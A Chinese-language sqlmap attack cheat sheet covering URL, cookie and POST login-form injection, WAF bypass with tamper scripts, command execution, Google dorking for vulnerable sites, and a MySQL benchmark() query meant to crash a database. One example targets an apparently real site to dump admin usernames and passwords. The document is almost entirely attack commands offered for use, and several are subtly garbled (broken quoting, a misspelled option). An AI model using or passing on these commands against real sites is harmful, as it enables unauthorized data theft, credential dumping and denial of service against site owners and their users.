普通注入
Sqlmap -u “http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” --dbs
找到一个sql的注入点 探测他的库名 access的直接探表名
Sqlmap -u “http://”http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -D 探测出来的库名 --tables
探测库名后探测表名
Sqlmap -u “http://”http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -D 探测出来的库名 -T 探测出来的表名 --columns
探测他的列名
sqlmap -u "http://www.riyuba.com/news/index.asp?cataid=241" --dump -T admin -C "user,pwd"
探他的数据
cookie注入
一般有验证的注入会导致我们的注入失败有些网站经常提示一些禁止填写update delete等的字样这个时候普通的sql就不好用了
这时候可以试试cookie注入
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --dbs
查库
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --table --level 2
查表
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --columns -T admin --level 2
查字段
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx” --cookie “id=9” --dump -T admin -C “username,passwd” --level 2
查内容
Post登录框注入
注入点 “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx”
首先将这个登陆界面用burpsuite截下来保存成一个txt的文本,然后指定变量
./sqlmap.py -r 保存的txt文本 -p 指定的参数
或者自动搜索表单的形式
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --forms
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --data “tfusermane=1111&tfpasswd=1111”
上一行的user和pass是指定的参数部分是要抓玩包看才知道的。
Sqlmap ——交互写shell及命令执行
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx/login.xxx” --cs-cmd=ifconfig
后面可能需要 填写什么样的环境php asp jsp 的选择 然后在填写一下根目录地址
伪静态注入
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html” --dbs
探测数据库
请求延时注入
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html” --delay 1
后面的1表示的是隔一秒继续访问这个页面
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html” --safe-freq 3
安全的频率为3次每秒
Google的注入搜索
Sqlmap -g inurl:php? Id=
用google的搜索引擎自动取匹配url php环境 后面有id=xxx的网站
Mysql的dos攻击
Sqlmap -u “http://www.xxx.xxx.xxx/xxx/xxx.html” --sql-shell
首先在知道这个注入点之后我们先获取一下他的shell
Select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
在shell下可以用这条语句可以使数据库报错重启
绕过waf(利用脚本)注:不同的脚本针对的数据库也不同
Sqlmap -u “http://www.xxxxxx.com/xxxx/xxx/xxx.xxx?xx=xx” -v 3 --dbs --batch --tamper ‘space2morehash.py’
Space2hash.py base64encode.py charencode.py
这三个脚本是sqlmap自带的绕waf脚本各自的编码方式也不同